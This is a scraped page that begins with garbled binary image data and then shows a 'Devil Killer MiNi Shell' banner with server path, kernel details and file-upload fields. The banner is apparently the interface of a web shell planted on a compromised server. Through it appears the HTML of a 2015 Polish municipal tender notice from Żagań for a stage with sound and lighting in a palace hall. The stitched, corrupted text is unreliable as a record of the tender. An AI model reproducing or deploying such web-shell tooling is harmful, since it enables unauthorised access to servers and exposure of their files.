JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151123/316134-N-2015.html

<p class="kh_header"><b>Żagań: Wykonanie sceny wraz o oświetleniem i nagłośnieniem w Sali Kryształowej Pałacu Książęcego w Żaganiu- w systemie usługi zaprojektuj i wykonaj.</b><br>
<b>Numer ogłoszenia: 316134 - 2015; data zamieszczenia: 23.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żagań o Statusie Miejskim , Plac Słowiański 17, 68-100 Żagań, woj. lubuskie, tel. 68 4771040, faks 68 4771017.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie sceny wraz o oświetleniem i nagłośnieniem w Sali Kryształowej Pałacu Książęcego w Żaganiu- w systemie usługi zaprojektuj i wykonaj..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia:
Przedmiotem niniejszego zamówienia jest zaprojektowanie i  wykonanie w pomieszczeniach  Pałacu Książęcego w Żaganiu (głównie w Sali Kryształowej) sceny artystycznej z kompletnym wyposażeniem nagłaśniającym i           wyposażeniem Sali w niezbędne (podstawowe)  elementy  instalacji potrzebne  do podłączenia w późniejszym terminie oświetlenia scenicznego. Przedmiotowe prace wykonane będą w oparciu o posiadaną przez Zamawiającego koncepcję technologii sceny Sali Kryształowej Pałacu Książęcego i zascenia w tym : wykonania sceny, kratownic, kurtyn, montażu systemu nagłaśniającego i podstawowego (wstępnego) montażu instalacji  oświetlenia scenicznego. Koncepcja technologii jest jedynie  podglądowym  wyznacznikiem przedmiotu zamówienia,  co do oczekiwań Zamawiającego i w żaden  sposób nie stanowi wymaganej specyfikacji, co do ilościowego zestawienia urządzeń.
Wszystkie urządzenia i instalacje nagłośnieniowe i oświetleniowe  muszą posiadać certyfikaty CE, atesty, homologacje  lub deklaracje zgodności oraz dokumenty dopuszczające do sprzedaży i użytku, takie jak:  .
- Typ, rodzaj marka producenta proponowanego sprzętu, 
- Karty katalogowe ( karty produktu) wszystkich proponowanych urządzeń 
   nagłaśniających  i oświetleniowych, 
- Karty musza zawierać potwierdzenie spełnienia minimalnych parametrów wymienionych w koncepcji technologii sceny. Wymienione dokumenty należy dołączyć składając ofertę. 
 
Dodatkowo Wykonawca jest zobowiązany, podczas końcowego odbioru wykonanych robót, do przekazania wszelkich dokumentów dotyczących przedmiotu zamówienia,  w tym w szczególności :  instrukcje obsługi w języku  polskim,   opieczętowane i datowane (na dzień odbioru) karty gwarancyjne, certyfikaty, atesty lub inne dokumenty stwierdzające zgodność wyrobu  z określonymi przepisami lub normami).
W przypadku wątpliwości co do parametrów i producenta oferowanych urządzeń i innego sprzętu Zamawiający zastrzega sobie prawo żądania dostarczenia oferowanych urządzeń do testów.  W takim przypadku Wykonawca ma obowiązek dostarczenia urządzeń na swój koszt do siedziby Zamawiającego w terminie trzech dni roboczych od momentu otrzymania stosownego wezwania. 

Gwarancja na dostawę i użytkowanie sprzętu  minimum 3 lata z opcją door to door,  a także             w momencie reklamacji, jeżeli będzie to konieczne i wymagane przez Zamawiającego, dostawa porównywalnego (zamiennika) zareklamowanego sprzętu na koszt i odpowiedzialność Wykonawcy na okres reklamacji. Na czas naprawy sterowników Wykonawca zobowiązany jest dostarczyć równoważny pulpit zastępczy, pozwalający na szybkie przekopiowanie zapisanych spektakli.
Do dokumentacji powykonawczej przy odbiorze końcowym Wykonawca powinien dołączyć oświadczenie firmy serwisowej iż zapewni serwis gwarancyjny na okres 24 lub więcej miesięcy na urządzenia oferowane w niniejszym postępowaniu.

Wykonawca zobowiązany będzie do przeprowadzenia podstawowego szkolenia przez okres 2 dni w obsłudze zamontowanych urządzeń  osób wyznaczonych przez Zamawiającego, w miejscu wyznaczonym przez Zamawiającego  oraz szkolenia uzupełniającego w odstępie kilku tygodni od szkolenia wstępnego w zakresie obsługi oferowanego sprzętu.   

Zakres  zamówienia obejmuje :
1. Zaprojektowanie mobilnej sceny wraz z systemem nagłaśniającym i podstawowym (wstępnym) oświetleniem scenicznym. 
2. Budowa sceny  w  Sali Kryształowej Pałacu z założeniem wielofunkcyjności min. in.: funkcji teatralnej,  funkcji koncertowej, funkcji tanecznej, funkcji konferencyjnej.
3. Wykonanie systemu nagłaśniającego elektroakustycznego Sali Kryształowej Pałacu                  z głównym systemem nagłośnieniowym jako system głośnikowym z pionowym zerowym kątem propagacji fali akustycznej, co pozwoli na uniknięcie niepożądanych odbić                    i zniekształceń niekontrolowanych fal odbitych.
4. Wyposażenie Sali w niezbędne elementy oświetlenia scenicznego, które umożliwią obsługę małych i średnich imprez kulturalnych, zakładając wielofunkcyjność Sali. Wyposażenie akustyczne umożliwi kreowanie dowolnych wydarzeń na potrzeby własnych zespołów artystycznych Pałacu jak i ewentualnych wynajmów przez osoby i firmy zewnętrzne dostosowując oprawy oświetleniowe do warunków przestrzennych i technicznych sceny.
5. Dodatkowe wymogi zawarte w cenie to: próbne uruchomienie, szkolenie z zakresu obsługi co najmniej 2 osób wskazanych przez Zamawiającego. 

Zakres   przewidywanych  robót  w szczególności obejmuje:
1. Wykonanie projektu mobilnej sceny oraz systemu nagłaśniającego i oświetlenia scenicznego w oparciu o koncepcję Zamawiającego z uwzględnieniem bezinwazyjnego montażu poszczególnych elementów. 
2. Projekty musza uwzględniać /zawierać : 
    a)  w zakresie sceny:
        - wykonanie projektu wykonawczego podestu wraz z obliczeniami statycznymi, 
        - konstrukcja wsporcza, schody i inne elementy konstrukcyjne sceny nie mogą 
          być bezpośrednio montowane do posadzki ( parkiet drewniany), kategorycznie 
          zabronione jest przytwierdzanie elementów  sceny do podłogi poprzez 
          wiercenie, wbijanie, mocowania wsporników, itp. Przed montażem sceny należy 
          zabezpieczyć podłogę odpowiednimi materiałami chroniącymi parkiet przed 
          zniszczeniem, zarysowaniami, wgnieceniem; 
    b) w zakresie nagłośnienia : 
        - wykonanie projektu wykonawczego, 
        - łatwość w konfiguracji i adaptacji do potrzeb różnego rodzaju obsługiwanych imprez, 
        - najwyższą jakość przekazów dźwiękowych, z dobrą zrozumiałością mowy, 
        - brak możliwości mocowania elementów wyposażenia technologicznego do 
          ścian, stopu i podłóg pomieszczeń; 
    c) w zakresie oświetlenia:
        - łatwość w konfiguracji i adaptacji do potrzeb różnego rodzaju obsługiwanych imprez,
        - kompatybilność i możliwość doposażenia oświetlenia w późniejszym terminie,  
        - brak możliwości mocowania elementów wyposażenia technologicznego do 
          ścian, stopu i podłóg pomieszczeń.
3. Budowa sceny :
    a) podłoga sceny w postaci wyniesionej płaszczyzny o wysokości nad istniejącą podłogą 
        ok. 90 cm o powierzchni ok.102m2  wykonana w konstrukcji drewnianej z podestami ze 
        sklejki antypoślizgowej wodoodpornej. Podłogę należy wyposażyć w bariery 
        zabezpieczające boczne i tylną,
    b) podjazd techniczny dla transportu elementów scenografii, instrumentów, itp. wykonany 
        z podestów systemowych,
    c) kratownica nad sceną dla montażu okotarowania, dekoracji, oświetlenia, wykonana z 
        systemowych elementów aluminiowych oparta na czterech słupach z systemowych 
        elementów aluminiowych. Zarówno kratownica jak i słupy o wymiarach 300 x 300 cm,
    d) most oświetleniowy z aluminiowych systemowych elementów  o przekroju 400x400 cm 
        zamontowany przed portalem sceny oparty na dwóch słupach przekroju 300 x 300 cm,
    e) okotarowanie  w zakresie funkcji artystycznych min.  teatralnych, koncertowych i 
        tanecznych.  Elementy okotarowania : kurtyna główna, kulisy, horyzont sceny, maska 
        sceny, słupy i belka poprzeczna  wykonane z materiału trudnopalnego  o gramaturze 
        min. 350g/m2 ,
    f) wykonawca musi przewidzieć zaprojektowanie zgodnie z koncepcją, łukowych schodów 
        wejściowych na scenę i  wykonanie ich z drewna litego (dąb, buk) kolorystycznie  
        dopasowanego do istniejącego parkietu.
4. Nagłośnienie : do realizacji głównego zamierzenia  wybrano urządzenia dystrybutorów 
    funkcjonujących  na rynku europejskim,  wykonane z  wyposażeniem w:
    a) aktywny systemem nagłośnieniowy
    b) cyfrową konsolę mikserską audio 32Ch
    c) cyfrowy stagebox sceniczny 24 IN/12 OUT
    d) aktywną kolumnę monitorowania audio
    e) bezprzewodowy system mikrofonowy do ręki
    f) bezprzewodowy system mikrofonowy nagłowny 
    g) zestaw mikrofonów wokalnych, instrumentalnych i mikrofonów  do perkusji
    h) zestaw mikrofonów wielko membranowych
    i) odtwarzacz CD/MP3 z USB
    j) aktywny symetryzator audio monofoniczny i stereofoniczny
    k) interfejs audio USB
    l) okablowanie i osprzęt tj. statywy, futerały i inne akcesoria.
5. Instalacja do  obsługi oświetlenia  Sali Kryształowej :    
    a)  główny sterownik DMX w komplecie z laptopem- kpl    
    b)  przejściowe sterowniki - kpl
    c) regulator napięcia - kpl
    d) nadajnik DMX sterowany podczerwienią - kpl 
    e) nadajnik-odbiornik DMX - kpl    
    f)  instalacja sterowania cyfrowego DMX- kpl
    g) instalacja obwodów regulowanych, nieregulowanych, sygnałowych, okablowanie, 
        osprzęt, piony zasilające, rozdzielnia z elektrownią  typu rack w celu zasilania całości 
        sprzętu- kpl. 
6. UWAGI  :
1.  Przed przystąpieniem do wykonawstwa sceny, nagłośnienia i oświetlenia Wykonawca jest zobowiązany do uzyskania pozytywnej opinii Zamawiającego na temat przedstawionych projektów.
Oferowane urządzenia mają  być fabrycznie nowe, nieużytkowane w jakikolwiek sposób i muszą pochodzić z bieżącej produkcji. 
2. Wykonawca będzie odpowiedzialny za realizację prac zgodnie ze sporządzoną  dokumentacją projektową, specyfikacją techniczną, poleceniami nadzoru oraz zgodnie z ustawą Prawo Budowlane i Warunkami technicznymi wykonania i odbioru robót budowlano montażowych. 
Wszędzie tam,  gdzie do opisu przedmiotu zamówienia ( w  Koncepcji)  użyto znaków towarowych, patentów lub pochodzenia,  należy uznać, że wskazaniu takiemu towarzyszą wyrazy  lub równoważny. 
W przypadku wprowadzenia rozwiązań równoważnych z opisywanymi do dokumentacji, dla których nie podano minimalnych parametrów, które by tę równoznaczność potwierdzały - Wykonawca jest obowiązany zaoferować produkt o właściwościach zbliżonych, nadający się funkcjonalnie do zapotrzebowanego zastosowania. 
3. Wszystkie elementy  winny uwzględniać dostosowanie do istniejącego w pomieszczeniach systemu ostrzegawczego ppoż. (Cerberus Siemens Pro). 
4. Z uwagi na fakt, iż obiekt objęty jest ochroną konserwatorską występują pewne ograniczenia wykonawcze - brak możliwości mocowania elementów wyposażenia  do ścian, stropu i podłóg pomieszczeń.
5. Zamawiający informuje, że w czasie wykonywania prac objętych niniejszym postępowaniem w pomieszczaniach mogą obywać się imprezy okolicznościowe, zatem prace należy tak zorganizować tak, aby nie zakłócać funkcjonowania obiektu..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 44.21.23.00-2, 44.31.63.00-1, 31.52.72.60-6, 32.34.24.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.04.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający  żąda od Wykonawców wniesienia wadium.

2. Wadium  w wysokości 13 000.00 zł, słownie: trzynaście tysięcy   złotych i 00/100  należy wnieść przed upływem terminu składania ofert. 

3. Wadium należy wnieść w jednej z niżej  wymienionych  form: 
1)  pieniądzu; 
2)  poręczeniach bankowych lub poręczeniach spółdzielczej kasy  oszczędnościowo-  
     kredytowej, z tym że poręczenie kasy jest zawsze  poręczeniem pieniężnym; 
3)  gwarancjach bankowych; 
4)  gwarancjach ubezpieczeniowych; 
5)  poręczeniach udzielanych przez podmioty, o których mowa w art.6b  ust.5 pkt  2 ustawy z 
     dnia 9 listopada 2000r o utworzeniu Polskiej Agencji Rozwoju  Przedsiębiorczości (Dz.U.   
     Nr 109, poz.1158, z późn.zm). 
4.Wadium wnoszone w  pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego nr BZ WBK S.A. I O/ Żagań 39 1090 2558 0000 0006 4000 0101   i  przechowuje się na tym rachunku. 
5. Wadium wniesione w pieniądzu uznaje się za wniesione w sposób prawidłowy, gdy kwota wadium zostanie zaksięgowana  na wskazanym koncie  Zamawiającego nie później, jak przed upływem terminu składania ofert. 
Kopię  dowodu wpłaty wadium  Wykonawca dołącza do oferty. 
6. Dokument potwierdzający wniesienie wadium  w innej formie niż w pieniądzu winien być 
złożony w oryginale (odrębnie poza ofertą)  przed terminem składania ofert.
7. Wykonawca, którego  oferta nie będzie zabezpieczona wadium wniesionym we właściwej formie, terminie i kwocie zostanie wykluczony z przedmiotowego  postępowania.
8. Zamawiający zwraca  wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza. 
9. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zwraca się  wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.  
10.Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który  wycofał ofertę przed upływem terminu składania ofert. 
11.Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami  wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.  
12.Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu  zwrócono wadium na podstawie  pkt  8.8. SIWZ, jeżeli w wyniku  rozstrzygnięcia  odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca  wnosi  wadium w terminie  określonym przez Zamawiającego.
13. Zamawiający zatrzymuje wadium wraz z odsetkami jeżeli Wykonawca w odpowiedzi na  wezwanie, o którym mowa w  art.26 ust.3 ustawy Prawo zamówień publicznych, z przyczyn leżących po jego stronie,   nie złożył  dokumentów lub  oświadczeń o którym mowa w art. 25 ust.1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust.2 pkt.5 ustawy Pzp, lub informacji o tym, ze nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust.2 pkt.3, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej
14.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana : 
1)  odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach 
     określonych w ofercie; 
2)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
3)  zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn 
      leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)  w zakresie  posiadania  przez Wykonawcę uprawnień do wykonywania  określonej 
     działalności lub czynności, Zamawiający  nie stawia  szczególnych  wymagań;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2)  w zakresie posiadania wiedzy i doświadczenia Zamawiający uzna za spełniającego ten  
     wymóg tego Wykonawcę,  który w okresie ostatnich trzech  lat przed upływem składania 
     ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie,  wykonał : 
     -  co   najmniej 2 usługi  obejmujące swym zakresem  wykonanie sceny, nagłośnienia 
        i oświetlenia o wartości  usługi min. 200 000,00 zł brutto dla każdej z nich. 
     Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie.     
     Na potwierdzenie spełnienia tego  warunku Wykonawca złoży wraz z  ofertą dokument 
     określony  w rozdziale 6 punkt 6.1 podpunkt 2   wraz z załączeniem dowodów, czy usługi  
     ujęte w wykazie usług głównych zostały wykonane należycie, czy też  zostały  wykonane 
     nienależycie.  
     Dowodami  są poświadczenia wystawione przez  podmiot, na rzecz którego Wykonawca 
     świadczył usługę, z tym , że  poświadczenie  w odniesieniu do nadal wykonywanych 
     usług okresowych lub ciągłych powinno być wydane nie wcześniej niż na 3 miesiące 
     przed upływem terminu składania ofert i o wartości - do dnia składania ofert.  
     W przypadku gdy Zamawiający jest podmiotem na rzecz którego usługi  wskazane w 
     wykazie, zostały wcześniej wykonane, a w stosunku do których Zamawiający żąda 
     poświadczeń,  Wykonawca nie ma obowiązku przedkładania  dowodów- poświadczeń.
 
     Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od 
     charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji 
     obowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi  zasobami  w 
     trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu  pisemne 
     zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych 
     zasobów na potrzeby  wykonania zamówienia. 
     Podmiot, który zobowiązał się do udostepnienia zasobów odpowiada solidarnie z 
     wykonawcą za szkodę  zamawiającego powstałą wskutek nieudostępnienia tych 
     zasobów, chyba że za nieudostępnienie zasobów nie ponosi  winy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3)  w zakresie dysponowania osobami zdolnymi do wykonania zamówienia  Zamawiający 
     uzna za spełniającego ten warunek tego Wykonawcę, który będzie dysponował co 
     najmniej :   
       - jedną osobą  z uprawnieniami  konstruktora odpowiedzialnego za przygotowanie 
       dokumentacji statycznej, posiadającą  aktualny wpis do polskiej Izby Inżynierów 
        Budownictwa, oraz  
      - jedną osobą posiadającą  uprawnienia do kierowania robotami w zakresie instalacji 
        elektrycznej.  
      Na potwierdzenie spełnienia powyższych warunków, Wykonawca złoży wraz z ofertą 
      dokument  określony w  punkcie 6.1 podpunkt 3 SIWZ 
      Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie. 
      W zakresie dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca 
      może polegać na potencjale innych podmiotów, niezależnie od charakteru prawnego 
      łączących go z nimi stosunków. Wykonawca w takiej sytuacji  zobowiązany jest 
      udowodnić Zamawiającemu, iż będzie dysponował zasobami  niezbędnymi do realizacji 
      zamówienia, w szczególności  przedstawiając w tym celu pisemne zobowiązanie tych 
      podmiotów do oddania mu do dyspozycji  niezbędnych zasobów na okres  korzystania z 
      nich przy  wykonywaniu zamówienia, oraz składając  dokumenty  określone w punkcie 
      6.2 SIWZ,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4)  w zakresie sytuacji ekonomicznej i finansowej,  Zamawiający  nie stawia żadnego 
      szczególnego  warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>usługi  obejmujące swym zakresem  wykonanie sceny, nagłośnienia 
        i oświetlenia o wartości  usługi min. 200 000,00 zł brutto dla każdej z nich.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

